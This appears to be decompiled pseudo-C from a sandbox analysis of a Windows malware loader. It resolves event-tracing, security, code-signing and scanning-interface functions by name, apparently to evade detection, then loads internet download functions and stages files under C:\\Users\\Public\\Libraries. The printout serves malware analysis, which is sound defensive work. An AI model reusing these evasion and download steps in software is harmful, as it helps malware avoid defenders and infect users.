                                                                					E02514A98( &_v156, "TraceQueryInformation");
                                                                					_push(_v156);
                                                                					E02514A98( &_v160, "advapi32");
                                                                					_pop(_t3361);
                                                                					E025236CC(_v160, _t3210, _t3361, _t4138);
                                                                					E02514A98( &_v164, "TraceSetInformation");
                                                                					_push(_v164);
                                                                					E02514A98( &_v168, "advapi32");
                                                                					_pop(_t3364);
                                                                					E025236CC(_v168, _t3210, _t3364, _t4138);
                                                                					E02514A98( &_v172, "TraceMessageVa");
                                                                					_push(_v172);
                                                                					E02514A98( &_v176, "advapi32");
                                                                					_pop(_t3367);
                                                                					E025236CC(_v176, _t3210, _t3367, _t4138);
                                                                					E02514A98( &_v180, "TraceMessage");
                                                                					_push(_v180);
                                                                					E02514A98( &_v184, "advapi32");
                                                                					_pop(_t3370);
                                                                					E025236CC(_v184, _t3210, _t3370, _t4138);
                                                                					E02514A98( &_v188, "TraceEvent");
                                                                					_push(_v188);
                                                                					E02514A98( &_v192, "advapi32");
                                                                					_pop(_t3373);
                                                                					E025236CC(_v192, _t3210, _t3373, _t4138);
                                                                					E02514A98( &_v196, "TraceEventInstance");
                                                                					_push(_v196);
                                                                					E02514A98( &_v200, "advapi32");
                                                                					_pop(_t3376);
                                                                					E025236CC(_v200, _t3210, _t3376, _t4138);
                                                                					E02514A98( &_v204, "SetTraceCallback");
                                                                					_push(_v204);
                                                                					E02514A98( &_v208, "advapi32");
                                                                					_pop(_t3379);
                                                                					E025236CC(_v208, _t3210, _t3379, _t4138);
                                                                					E02514A98( &_v212, "SetSecurityInfo");
                                                                					_push(_v212);
                                                                					E02514A98( &_v216, "advapi32");
                                                                					_pop(_t3382);
                                                                					E025236CC(_v216, _t3210, _t3382, _t4138);
                                                                					E02514A98( &_v220, "SetSecurityInfoExA");
                                                                					_push(_v220);
                                                                					E02514A98( &_v224, "advapi32");
                                                                					_pop(_t3385);
                                                                					E025236CC(_v224, _t3210, _t3385, _t4138);
                                                                					E02514A98( &_v228, "SetSecurityInfoExW");
                                                                					_push(_v228);
                                                                					E02514A98( &_v232, "advapi32");
                                                                					_pop(_t3388);
                                                                					E025236CC(_v232, _t3210, _t3388, _t4138);
                                                                					E02514A98( &_v236, "SetSecurityAccessMask");
                                                                					_push(_v236);
                                                                					E02514A98( &_v240, "advapi32");
                                                                					_pop(_t3391);
                                                                					E025236CC(_v240, _t3210, _t3391, _t4138);
                                                                					E02514A98( &_v244, "SetPrivateObjectSecurityEx");
                                                                					_push(_v244);
                                                                					E02514A98( &_v248, "advapi32");
                                                                					_pop(_t3394);
                                                                					E025236CC(_v248, _t3210, _t3394, _t4138);
                                                                					E02514A98( &_v252, "SetKernelObjectSecurity");
                                                                					_push(_v252);
                                                                					E02514A98( &_v256, "advapi32");
                                                                					_pop(_t3397);
                                                                					E025236CC(_v256, _t3210, _t3397, _t4138);
                                                                					E02514A98( &_v260, "SetFileSecurityW");
                                                                					_push(_v260);
                                                                					E02514A98( &_v264, "advapi32");
                                                                					_pop(_t3400);
                                                                					E025236CC(_v264, _t3210, _t3400, _t4138);
                                                                					E02514A98( &_v268, "SetFileSecurityA");
                                                                					_push(_v268);
                                                                					E02514A98( &_v272, "advapi32");
                                                                					_pop(_t3403);
                                                                					E025236CC(_v272, _t3210, _t3403, _t4138);
                                                                					E02514A98( &_v276, "SaferSetPolicyInformation");
                                                                					_push(_v276);
                                                                					E02514A98( &_v280, "advapi32");
                                                                					_pop(_t3406);
                                                                					E025236CC(_v280, _t3210, _t3406, _t4138);
                                                                					E02514A98( &_v284, "SaferSetLevelInformation");
                                                                					_push(_v284);
                                                                					E02514A98( &_v288, "advapi32");
                                                                					_pop(_t3409);
                                                                					E025236CC(_v288, _t3210, _t3409, _t4138);
                                                                					E02514A98( &_v292, "ReportEventW");
                                                                					_push(_v292);
                                                                					E02514A98( &_v296, "advapi32");
                                                                					_pop(_t3412);
                                                                					E025236CC(_v296, _t3210, _t3412, _t4138);
                                                                					E02514A98( &_v300, "ReportEventA");
                                                                					_push(_v300);
                                                                					E02514A98( &_v304, "advapi32");
                                                                					_pop(_t3415);
                                                                					E025236CC(_v304, _t3210, _t3415, _t4138);
                                                                					E02514A98( &_v308, "ReadEventLogW");
                                                                					_push(_v308);
                                                                					E02514A98( &_v312, "advapi32");
                                                                					_pop(_t3418);
                                                                					E025236CC(_v312, _t3210, _t3418, _t4138);
                                                                					E02514A98( &_v316, "ReadEventLogA");
                                                                					_push(_v316);
                                                                					E02514A98( &_v320, "advapi32");
                                                                					_pop(_t3421);
                                                                					E025236CC(_v320, _t3210, _t3421, _t4138);
                                                                					E02514A98( &_v324, "OpenEventLogW");
                                                                					_push(_v324);
                                                                					E02514A98( &_v328, "advapi32");
                                                                					_pop(_t3424);
                                                                					E025236CC(_v328, _t3210, _t3424, _t4138);
                                                                					E02514A98( &_v332, "OpenEventLogA");
                                                                					_push(_v332);
                                                                					E02514A98( &_v336, "advapi32");
                                                                					_pop(_t3427);
                                                                					E025236CC(_v336, _t3210, _t3427, _t4138);
                                                                					E02514A98( &_v340, "SaferRecordEventLogEntry");
                                                                					_push(_v340);
                                                                					E02514A98( &_v344, "advapi32");
                                                                					_pop(_t3430);
                                                                					E025236CC(_v344, _t3210, _t3430, _t4138);
                                                                					E02514A98( &_v348, "GetEventLogInformation");
                                                                					_push(_v348);
                                                                					E02514A98( &_v352, "advapi32");
                                                                					_pop(_t3433);
                                                                					E025236CC(_v352, _t3210, _t3433, _t4138);
                                                                					E02514A98( &_v356, "ElfReadEventLogW");
                                                                					_push(_v356);
                                                                					E02514A98( &_v360, "advapi32");
                                                                					_pop(_t3436);
                                                                					E025236CC(_v360, _t3210, _t3436, _t4138);
                                                                					E02514A98( &_v364, "ElfReadEventLogA");
                                                                					_push(_v364);
                                                                					E02514A98( &_v368, "advapi32");
                                                                					_pop(_t3439);
                                                                					E025236CC(_v368, _t3210, _t3439, _t4138);
                                                                					E02514A98( &_v372, "ElfOpenEventLogW");
                                                                					_push(_v372);
                                                                					E02514A98( &_v376, "advapi32");
                                                                					_pop(_t3442);
                                                                					E025236CC(_v376, _t3210, _t3442, _t4138);
                                                                					E02514A98( &_v380, "ElfOpenEventLogA");
                                                                					_push(_v380);
                                                                					E02514A98( &_v384, "advapi32");
                                                                					_pop(_t3445);
                                                                					E025236CC(_v384, _t3210, _t3445, _t4138);
                                                                					E02514A98( &_v388, "BuildSecurityDescriptorA");
                                                                					_push(_v388);
                                                                					E02514A98( &_v392, "advapi32");
                                                                					_pop(_t3448);
                                                                					E025236CC(_v392, _t3210, _t3448, _t4138);
                                                                					E02514A98( &_v396, "BuildImpersonateTrusteeW");
                                                                					_push(_v396);
                                                                					E02514A98( &_v400, "advapi32");
                                                                					_pop(_t3451);
                                                                					E025236CC(_v400, _t3210, _t3451, _t4138);
                                                                					E02514A98( &_v404, "BuildSecurityDescriptorW");
                                                                					_push(_v404);
                                                                					E02514A98( &_v408, "advapi32");
                                                                					_pop(_t3454);
                                                                					E025236CC(_v408, _t3210, _t3454, _t4138);
                                                                					E02514A98( &_v412, "AccessCheckByType");
                                                                					_push(_v412);
                                                                					E02514A98( &_v416, "advapi32");
                                                                					_pop(_t3457);
                                                                					E025236CC(_v416, _t3210, _t3457, _t4138);
                                                                					E02514A98( &_v420, "CryptSIPCreateIndirectData");
                                                                					_push(_v420);
                                                                					E02514A98( &_v424, "mssip32");
                                                                					_pop(_t3460); // executed
                                                                					E025236CC(_v424, _t3210, _t3460, _t4138); // executed
                                                                					E02514A98( &_v428, "CryptSIPGetInfo");
                                                                					_push(_v428);
                                                                					E02514A98( &_v432, "mssip32");
                                                                					_pop(_t3463); // executed
                                                                					E025236CC(_v432, _t3210, _t3463, _t4138); // executed
                                                                					E02514A98( &_v436, "CryptSIPGetSignedDataMsg");
                                                                					_push(_v436);
                                                                					E02514A98( &_v440, "mssip32");
                                                                					_pop(_t3466); // executed
                                                                					E025236CC(_v440, _t3210, _t3466, _t4138); // executed
                                                                					E02514A98( &_v444, "CryptSIPVerifyIndirectData");
                                                                					_push(_v444);
                                                                					E02514A98( &_v448, "mssip32");
                                                                					_pop(_t3469); // executed
                                                                					E025236CC(_v448, _t3210, _t3469, _t4138); // executed
                                                                					E02514A98( &_v452, "DllGetClassObject");
                                                                					_push(_v452);
                                                                					E02514A98( &_v456, "wuapi");
                                                                					_pop(_t3472); // executed
                                                                					E025236CC(_v456, _t3210, _t3472, _t4138); // executed
                                                                					E02514A98( &_v460, "SoftpubDefCertInit");
                                                                					_push(_v460);
                                                                					E02514A98( &_v464, "softpub");
                                                                					_pop(_t3475); // executed
                                                                					E025236CC(_v464, _t3210, _t3475, _t4138); // executed
                                                                					E02514A98( &_v468, "FindCertsByIssuer");
                                                                					_push(_v468);
                                                                					E02514A98( &_v472, "softpub");
                                                                					_pop(_t3478); // executed
                                                                					E025236CC(_v472, _t3210, _t3478, _t4138); // executed
                                                                					E02514A98( &_v476, "SoftpubCheckCert");
                                                                					_push(_v476);
                                                                					E02514A98( &_v480, "softpub");
                                                                					_pop(_t3481); // executed
                                                                					E025236CC(_v480, _t3210, _t3481, _t4138); // executed
                                                                					E02514A98( &_v484, "SoftpubInitialize");
                                                                					_push(_v484);
                                                                					E02514A98( &_v488, "softpub");
                                                                					_pop(_t3484); // executed
                                                                					E025236CC(_v488, _t3210, _t3484, _t4138); // executed
                                                                					_t1499 = E0251304C(0x208);
                                                                					_t4144 = _t1499;
                                                                					if(_t1499 != 0) {
                                                                						E025148F4(0x256dcd8, 0x252ad50);
                                                                					} else {
                                                                						E025148F4(0x256dcd8, "5E5CDDEE");
                                                                					}
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("Initialize");
                                                                					E02514C24();
                                                                					E02514A98( &_v492, E02514D64(_v496));
                                                                					_push(_v492);
                                                                					_t3221 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0( &_v504, _t3221, 0x252ad5c);
                                                                					E02514A98( &_v500, E02514D64(_v504));
                                                                					_pop(_t3490); // executed
                                                                					E025236CC(_v500, _t3210, _t3490, _t4138); // executed
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("OpenSession");
                                                                					E02514C24();
                                                                					E02514A98( &_v508, E02514D64(_v512));
                                                                					_push(_v508);
                                                                					_t3222 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0( &_v520, _t3222, 0x252ad5c);
                                                                					E02514A98( &_v516, E02514D64(_v520));
                                                                					_pop(_t3495); // executed
                                                                					E025236CC(_v516, _t3210, _t3495, _t4138); // executed
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("ScanString");
                                                                					E02514C24();
                                                                					E02514A98( &_v524, E02514D64(_v528));
                                                                					_push(_v524);
                                                                					_t3223 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0( &_v536, _t3223, 0x252ad5c);
                                                                					E02514A98( &_v532, E02514D64(_v536));
                                                                					_pop(_t3500); // executed
                                                                					E025236CC(_v532, _t3210, _t3500, _t4138); // executed
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("ScanBuffer");
                                                                					E02514C24();
                                                                					E02514A98( &_v540, E02514D64(_v544));
                                                                					_push(_v540);
                                                                					_t3224 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0( &_v552, _t3224, 0x252ad5c);
                                                                					E02514A98( &_v548, E02514D64(_v552));
                                                                					_pop(_t3505); // executed
                                                                					E025236CC(_v548, _t3210, _t3505, _t4138); // executed
                                                                					E02512FC4(E02517DA0(0x252adb8, _t4144),  &_v560);
                                                                					E025181E0(_v560,  &_v556);
                                                                					E025148F4(0x256d8f4, _v556);
                                                                					_t1565 =  *0x256d8f4; // 0x7f470018
                                                                					_v564 = _t1565;
                                                                					_t3211 = _v564;
                                                                					if(_t3211 != 0) {
                                                                						_t3211 =  *((intOrPtr*)(_t3211 - 4));
                                                                					}
                                                                					_t1566 =  *0x256d8f4; // 0x7f470018
                                                                					E02514DC4(_t1566, _t3211 - 4, 1, 0x256d8e0);
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("ScanBuffer");
                                                                					E02514C24();
                                                                					E02514A98( &_v568, E02514D64(_v572));
                                                                					_push(_v568);
                                                                					_t3227 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0( &_v580, _t3227, 0x252ad5c);
                                                                					E02514A98( &_v576, E02514D64(_v580));
                                                                					_pop(_t3514); // executed
                                                                					E025236CC(_v576, _t3211, _t3514, _t4138);
                                                                					_t1582 =  *0x256d8e0; // 0x2a2da38
                                                                					_t1583 = E02518110(_t1582);
                                                                					_t4147 = _t1583;
                                                                					if(_t1583 == 0) {
                                                                						_push(0x252ad5c);
                                                                						_push( *0x256dcd8);
                                                                						_push("OpenSession");
                                                                						E02514C24();
                                                                						E02514A98( &_v600, E02514D64(_v604));
                                                                						_push(_v600);
                                                                						_t3228 =  *0x256dcd8; // 0x2a51b38
                                                                						E02514BB0( &_v612, _t3228, 0x252ad5c);
                                                                						E02514A98( &_v608, E02514D64(_v612));
                                                                						_pop(_t3519); // executed
                                                                						E025236CC(_v608, _t3211, _t3519, _t4138); // executed
                                                                						_push(0x252ad5c);
                                                                						_push( *0x256dcd8);
                                                                						_push("ScanBuffer");
                                                                						E02514C24();
                                                                						E02514A98( &_v616, E02514D64(_v620));
                                                                						_push(_v616);
                                                                						_t3229 =  *0x256dcd8; // 0x2a51b38
                                                                						E02514BB0( &_v628, _t3229, 0x252ad5c);
                                                                						E02514A98( &_v624, E02514D64(_v628));
                                                                						_pop(_t3524); // executed
                                                                						E025236CC(_v624, _t3211, _t3524, _t4138); // executed
                                                                						E02512FC4(E02517DA0(0x252adb8, __eflags),  &_v632);
                                                                						E02513300(0x256d8f8, _v632, __eflags, _t4158);
                                                                						_t1617 =  *0x2569d7c; // 0x252d00c
                                                                						 *_t1617 = 0;
                                                                						E02512D28(E025136BC());
                                                                						E02514F90(0x256da8c, E02512D28(E025134CC(0x256d8f8)));
                                                                						_t1626 =  *0x256da8c; // 0x7fae0018
                                                                						_v564 = _t1626;
                                                                						_t3212 = _v564;
                                                                						__eflags = _t3212;
                                                                						if(_t3212 != 0) {
                                                                							_t3215 = _t3212 - 4;
                                                                							__eflags = _t3215;
                                                                							_t3212 =  *_t3215;
                                                                						}
                                                                						E02514DBC(0x256da8c);
                                                                						_t1630 = E02513454(0); // executed
                                                                						E02512D28(_t1630);
                                                                						E02512D28(E02513474(0x256d8f8));
                                                                						_t1635 =  *0x256da8c; // 0x7fae0018, executed
                                                                						E02525300(_t1635, _t3212,  &_v636, 0x252adc4, _t4137, _t4138); // executed
                                                                						_t3232 =  *0x25251f8; // 0x25251fc
                                                                						E02515A4C(0x256da94, _t3232, _v636);
                                                                						_t3532 =  *0x256da94; // 0x7f290018
                                                                						E025148F4(0x256da44,  *((intOrPtr*)(_t3532 + 4)));
                                                                						_t1642 = E02517DA0(0x252add4, __eflags);
                                                                						_t1643 =  *0x256da44; // 0x2a0ec18
                                                                						E02525B34(_t1643, _t3212,  &_v640, _t1642, _t4138);
                                                                						E025148F4(0x256dcdc, _v640);
                                                                						_t1647 =  *0x256dcdc; // 0x2a078e8
                                                                						__eflags = E0252521C(_t1647) - 1;
                                                                						if(__eflags == 0) {
                                                                							_t3149 =  *0x256dcdc; // 0x2a078e8, executed
                                                                							E02525974(_t3149, _t3212,  &_v640,  &_v644, _t4138, __eflags); // executed
                                                                							E025148F4(0x256da88, _v644);
                                                                							Sleep(0x1f4); // executed
                                                                							E02514A98( &_v648, "InternetOpenW");
                                                                							_push(_v648);
                                                                							E02514A98( &_v652, "wininet");
                                                                							_pop(_t4120); // executed
                                                                							E025236CC(_v652, _t3212, _t4120, _t4138); // executed
                                                                							E02514A98( &_v656, "InternetOpenUrlA");
                                                                							_push(_v656);
                                                                							E02514A98( &_v660, "wininet");
                                                                							_pop(_t4123);
                                                                							E025236CC(_v660, _t3212, _t4123, _t4138);
                                                                							E02514A98( &_v664, "InternetReadFile");
                                                                							_push(_v664);
                                                                							E02514A98( &_v668, "wininet");
                                                                							_pop(_t4126);
                                                                							E025236CC(_v668, _t3212, _t4126, _t4138);
                                                                						}
                                                                						_t1649 =  *0x256da88; // 0x7f570018, executed
                                                                						_t1650 = E025258B0(_t1649, _t3212, __eflags); // executed
                                                                						__eflags = _t1650 - 1;
                                                                						if(_t1650 == 1) {
                                                                							_t3110 =  *0x256da8c; // 0x7fae0018
                                                                							E02525300(_t3110, _t3212,  &_v672, 0x252ae20, _t4137, _t4138);
                                                                							_t3318 =  *0x25251f8; // 0x25251fc
                                                                							E02515A4C(0x256da94, _t3318, _v672);
                                                                							_t4101 =  *0x256da94; // 0x7f290018
                                                                							E025148F4(0x256da44,  *((intOrPtr*)(_t4101 + 4)));
                                                                							_t3117 = E02517DA0(0x252add4, __eflags);
                                                                							_t3118 =  *0x256da44; // 0x2a0ec18
                                                                							E02525B34(_t3118, _t3212,  &_v676, _t3117, _t4138);
                                                                							E025148F4(0x256dcdc, _v676);
                                                                							_t3122 =  *0x256dcdc; // 0x2a078e8
                                                                							__eflags = E0252521C(_t3122) - 1;
                                                                							if(__eflags == 0) {
                                                                								_t3145 =  *0x256dcdc; // 0x2a078e8
                                                                								E02525974(_t3145, _t3212,  &_v676,  &_v680, _t4138, __eflags);
                                                                								E025148F4(0x256da88, _v680);
                                                                							}
                                                                							Sleep(0x1f4);
                                                                							E02514A98( &_v684, "InternetOpenW");
                                                                							_push(_v684);
                                                                							E02514A98( &_v688, "wininet");
                                                                							_pop(_t4107);
                                                                							E025236CC(_v688, _t3212, _t4107, _t4138);
                                                                							E02514A98( &_v692, "InternetOpenUrlA");
                                                                							_push(_v692);
                                                                							E02514A98( &_v696, "wininet");
                                                                							_pop(_t4110);
                                                                							E025236CC(_v696, _t3212, _t4110, _t4138);
                                                                							E02514A98( &_v700, "InternetReadFile");
                                                                							_push(_v700);
                                                                							E02514A98( &_v704, "wininet");
                                                                							_pop(_t4113);
                                                                							E025236CC(_v704, _t3212, _t4113, _t4138);
                                                                						}
                                                                					} else {
                                                                						_push(0x252ad5c);
                                                                						_push( *0x256dcd8);
                                                                						_push("OpenSession");
                                                                						E02514C24();
                                                                						E02514A98( &_v584, E02514D64(_v588));
                                                                						_push(_v584);
                                                                						_t3320 =  *0x256dcd8; // 0x2a51b38
                                                                						E02514BB0( &_v596, _t3320, 0x252ad5c);
                                                                						E02514A98( &_v592, E02514D64(_v596));
                                                                						_pop(_t4131);
                                                                						E025236CC(_v592, _t3211, _t4131, _t4138);
                                                                						_t4132 =  *0x256d8e0; // 0x2a2da38
                                                                						E02513300(0x256d8f8, _t4132, _t4147, _t4158);
                                                                						_t3190 =  *0x2569d7c; // 0x252d00c
                                                                						 *_t3190 = 0;
                                                                						E02512D28(E025136BC());
                                                                						E02514F90(0x256da88, E02512D28(E025134CC(0x256d8f8)));
                                                                						_t3199 =  *0x256da88; // 0x7f570018
                                                                						_v564 = _t3199;
                                                                						_t3212 = _v564;
                                                                						if(_t3212 != 0) {
                                                                							_t3216 = _t3212 - 4;
                                                                							_t4149 = _t3216;
                                                                							_t3212 =  *_t3216;
                                                                						}
                                                                						E02514DBC(0x256da88);
                                                                						E02512D28(E02513454(0));
                                                                						E02512D28(E02513474(0x256d8f8));
                                                                					}
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("Initialize");
                                                                					E02514C24();
                                                                					E02514A98( &_v708, E02514D64(_v712));
                                                                					_push(_v708);
                                                                					_t3234 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0( &_v720, _t3234, 0x252ad5c);
                                                                					E02514A98( &_v716, E02514D64(_v720));
                                                                					_pop(_t3540); // executed
                                                                					E025236CC(_v716, _t3212, _t3540, _t4138); // executed
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("OpenSession");
                                                                					E02514C24();
                                                                					E02514A98( &_v724, E02514D64(_v728));
                                                                					_push(_v724);
                                                                					_t3235 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0( &_v736, _t3235, 0x252ad5c);
                                                                					E02514A98( &_v732, E02514D64(_v736));
                                                                					_pop(_t3545); // executed
                                                                					E025236CC(_v732, _t3212, _t3545, _t4138); // executed
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("ScanString");
                                                                					E02514C24();
                                                                					E02514A98( &_v740, E02514D64(_v744));
                                                                					_push(_v740);
                                                                					_t3236 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0( &_v752, _t3236, 0x252ad5c);
                                                                					E02514A98( &_v748, E02514D64(_v752));
                                                                					_pop(_t3550); // executed
                                                                					E025236CC(_v748, _t3212, _t3550, _t4138); // executed
                                                                					E025148F4(0x256da50, 0x252add4);
                                                                					_push(0x252ad5c);
                                                                					_push( *0x256dcd8);
                                                                					_push("ScanBuffer");
                                                                					E02514C24();
                                                                					E02514A98( &_v756, E02514D64(_v760));
                                                                					_push(_v756);
                                                                					_t3237 =  *0x256dcd8; // 0x2a51b38
                                                                					E02514BB0( &_v768, _t3237, 0x252ad5c);
                                                                					E02514A98( &_v764, E02514D64(_v768));
                                                                					_pop(_t3556); // executed
                                                                					E025236CC(_v764, _t3212, _t3556, _t4138);
                                                                					_t1709 =  *0x256da88; // 0x7f570018, executed
                                                                					_t1710 = E025258B0(_t1709, _t3212, _t4149); // executed
                                                                					_t4150 = (_t1710 ^ 0x00000001) - 1;
                                                                					if((_t1710 ^ 0x00000001) != 1) {
                                                                						goto L51;
                                                                					} else {
                                                                						_t1712 =  *0x256da50; // 0x2a51b48
                                                                						_t1713 = E02517DA0(_t1712, _t4150);
                                                                						_t1714 =  *0x256da88; // 0x7f570018
                                                                						E02525BDC(_t1714, _t3212,  &_v772, _t1713, _t4137, _t4138);
                                                                						E025148F4(0x256d8f4, _v772);
                                                                						_t1718 =  *0x256d8f4; // 0x7f470018
                                                                						E02525AC0(_t1718, _t3212,  &_v772,  &_v776, _t4137, _t4138);
                                                                						E025148F4(0x256d8f4, _v776);
                                                                						_push(0x252ad5c);
                                                                						_push( *0x256dcd8);
                                                                						_push("ScanString");
                                                                						E02514C24();
                                                                						E02514A98( &_v780, E02514D64(_v784));
                                                                						_push(_v780);
                                                                						_t3239 =  *0x256dcd8; // 0x2a51b38
                                                                						E02514BB0( &_v792, _t3239, 0x252ad5c);
                                                                						E02514A98( &_v788, E02514D64(_v792));
                                                                						_pop(_t3565); // executed
                                                                						E025236CC(_v788, _t3212, _t3565, _t4138); // executed
                                                                						_t3566 =  *0x252dffc; // 0x54ed44
                                                                						E02514B28( &_v800, _t3566);
                                                                						_t1738 =  *0x256d8f4; // 0x7f470018, executed
                                                                						E02525300(_t1738, _t3212,  &_v796, _v800, _t4137, _t4138); // executed
                                                                						_t3241 =  *0x25251f8; // 0x25251fc
                                                                						E02515A4C(0x256da94, _t3241, _v796);
                                                                						_t3569 =  *0x256da94; // 0x7f290018
                                                                						E025148F4(0x256dd00,  *((intOrPtr*)(_t3569 + 4)));
                                                                						_t3571 =  *0x256da94; // 0x7f290018
                                                                						E025148F4(0x256dcf8,  *((intOrPtr*)(_t3571 + 8)));
                                                                						_t3573 =  *0x256da94; // 0x7f290018
                                                                						E025148F4(0x256da80,  *((intOrPtr*)(_t3573 + 0xc)));
                                                                						_t3575 =  *0x256da94; // 0x7f290018
                                                                						E025148F4(0x256dcfc,  *((intOrPtr*)(_t3575 + 0x10)));
                                                                						_t3577 =  *0x256da94; // 0x7f290018
                                                                						E025148F4(0x256dce0,  *((intOrPtr*)(_t3577 + 0x14)));
                                                                						_t3579 =  *0x256da94; // 0x7f290018
                                                                						E025148F4(0x256dce4,  *((intOrPtr*)(_t3579 + 0x18)));
                                                                						_t3581 =  *0x256da94; // 0x7f290018
                                                                						E025148F4(0x256dce8,  *((intOrPtr*)(_t3581 + 0x1c)));
                                                                						_t3583 =  *0x256da94; // 0x7f290018
                                                                						E025148F4(0x256dcec,  *((intOrPtr*)(_t3583 + 0x20)));
                                                                						_t3585 =  *0x256da94; // 0x7f290018
                                                                						E025148F4(0x256dcf0,  *((intOrPtr*)(_t3585 + 0x24)));
                                                                						_push(0x252ad5c);
                                                                						_push( *0x256dcd8);
                                                                						_push("Initialize");
                                                                						E02514C24();
                                                                						E02514A98( &_v804, E02514D64(_v808));
                                                                						_push(_v804);
                                                                						_t3242 =  *0x256dcd8; // 0x2a51b38
                                                                						E02514BB0( &_v816, _t3242, 0x252ad5c);
                                                                						E02514A98( &_v812, E02514D64(_v816));
                                                                						_pop(_t3591); // executed
                                                                						E025236CC(_v812, _t3212, _t3591, _t4138); // executed
                                                                						_push(0x252ad5c);
                                                                						_push( *0x256dcd8);
                                                                						_push("OpenSession");
                                                                						E02514C24();
                                                                						E02514A98( &_v820, E02514D64(_v824));
                                                                						_push(_v820);
                                                                						_t3243 =  *0x256dcd8; // 0x2a51b38
                                                                						E02514BB0( &_v832, _t3243, 0x252ad5c);
                                                                						E02514A98( &_v828, E02514D64(_v832));
                                                                						_pop(_t3596); // executed
                                                                						E025236CC(_v828, _t3212, _t3596, _t4138); // executed
                                                                						_push(0x252ad5c);
                                                                						_push( *0x256dcd8);
                                                                						_push("ScanString");
                                                                						E02514C24();
                                                                						E02514A98( &_v836, E02514D64(_v840));
                                                                						_push(_v836);
                                                                						_t3244 =  *0x256dcd8; // 0x2a51b38
                                                                						E02514BB0( &_v848, _t3244, 0x252ad5c);
                                                                						E02514A98( &_v844, E02514D64(_v848));
                                                                						_pop(_t3601); // executed
                                                                						E025236CC(_v844, _t3212, _t3601, _t4138); // executed
                                                                						E025148F4(0x256da90, "C:\\Users\\Public\\Libraries");
                                                                						_t1804 =  *0x256da90; // 0x2a35050
                                                                						E02514A98( &_v852, E02514D64(_t1804));
                                                                						if(E02518134(_v852) == 0) {
                                                                							_t3104 =  *0x256da90; // 0x2a35050
                                                                							E02514A98( &_v856, E02514D64(_t3104));
                                                                							E025182C8(_v856);
                                                                						}
                                                                						_t1810 =  *0x256dcf8; // 0x2a59628
                                                                						_v564 = _t1810;
                                                                						_t3213 = _v564;
                                                                						if(_t3213 != 0) {
                                                                							_t3213 =  *((intOrPtr*)(_t3213 - 4));
                                                                						}
                                                                						_t1811 =  *0x256dcf8; // 0x2a59628
                                                                						E02514DC4(_t1811, _t3213 != 3, 1, 0x256dcf8);
                                                                						_push(0x252ad5c);
                                                                						_push( *0x256dcd8);
                                                                						_push("ScanString");
                                                                						E02514C24();
                                                                						E02514A98( &_v860, E02514D64(_v864));
                                                                						_push(_v860);
                                                                						_t3247 =  *0x256dcd8; // 0x2a51b38
                                                                						E02514BB0( &_v872, _t3247, 0x252ad5c);
                                                                						E02514A98( &_v868, E02514D64(_v872));
                                                                						_pop(_t3609); // executed
                                                                						E025236CC(_v868, _t3213, _t3609, _t4138);
                                                                						_t1827 =  *0x256dce0; // 0x2a51b98
                                                                						E02514CB0(_t1827, 0x252ae54);
                                                                						if(_t3213 != 3) {
                                                                							L31:
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("Initialize");
                                                                							E02514C24();
                                                                							E02514A98( &_v1076, E02514D64(_v1080));
                                                                							_push(_v1076);
                                                                							_t3248 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0( &_v1088, _t3248, 0x252ad5c);
                                                                							E02514A98( &_v1084, E02514D64(_v1088));
                                                                							_pop(_t3615); // executed
                                                                							E025236CC(_v1084, _t3213, _t3615, _t4138); // executed
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("OpenSession");
                                                                							E02514C24();
                                                                							E02514A98( &_v1092, E02514D64(_v1096));
                                                                							_push(_v1092);
                                                                							_t3249 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0( &_v1104, _t3249, 0x252ad5c);
                                                                							E02514A98( &_v1100, E02514D64(_v1104));
                                                                							_pop(_t3620); // executed
                                                                							E025236CC(_v1100, _t3213, _t3620, _t4138); // executed
                                                                							_push(0x252ad5c);
                                                                							_push( *0x256dcd8);
                                                                							_push("ScanString");
                                                                							E02514C24();
                                                                							E02514A98( &_v1108, E02514D64(_v1112));
                                                                							_push(_v1108);
                                                                							_t3250 =  *0x256dcd8; // 0x2a51b38
                                                                							E02514BB0( &_v1120, _t3250, 0x252ad5c);
                                                                							E02514A98( &_v1116, E02514D64(_v1120));
                                                                							_pop(_t3625); // executed
                                                                							E025236CC(_v1116, _t3213, _t3625, _t4138);
                                                                							_t1871 =  *0x256dcfc; // 0x0
                                                                							E02514CB0(_t1871, 0x252ae54);
                                                                							if(__eflags != 0) {
                                                                								L38:
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("Initialize");
                                                                								E02514C24();
                                                                								E02514A98( &_v1704, E02514D64(_v1708));
                                                                								_push(_v1704);
                                                                								_t3251 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v1716, _t3251, 0x252ad5c);
                                                                								E02514A98( &_v1712, E02514D64(_v1716));
                                                                								_pop(_t3631); // executed
                                                                								E025236CC(_v1712, _t3213, _t3631, _t4138); // executed
                                                                								_push(0x252ad5c);
                                                                								_push( *0x256dcd8);
                                                                								_push("OpenSession");
                                                                								E02514C24();
                                                                								E02514A98( &_v1720, E02514D64(_v1724));
                                                                								_push(_v1720);
                                                                								_t3252 =  *0x256dcd8; // 0x2a51b38
                                                                								E02514BB0( &_v1732, _t3252, 0x252ad5c);
                                                                								E02514A98( &_v1728, E02514D64(_v1732));
                                                                								_pop(_t3636); // executed
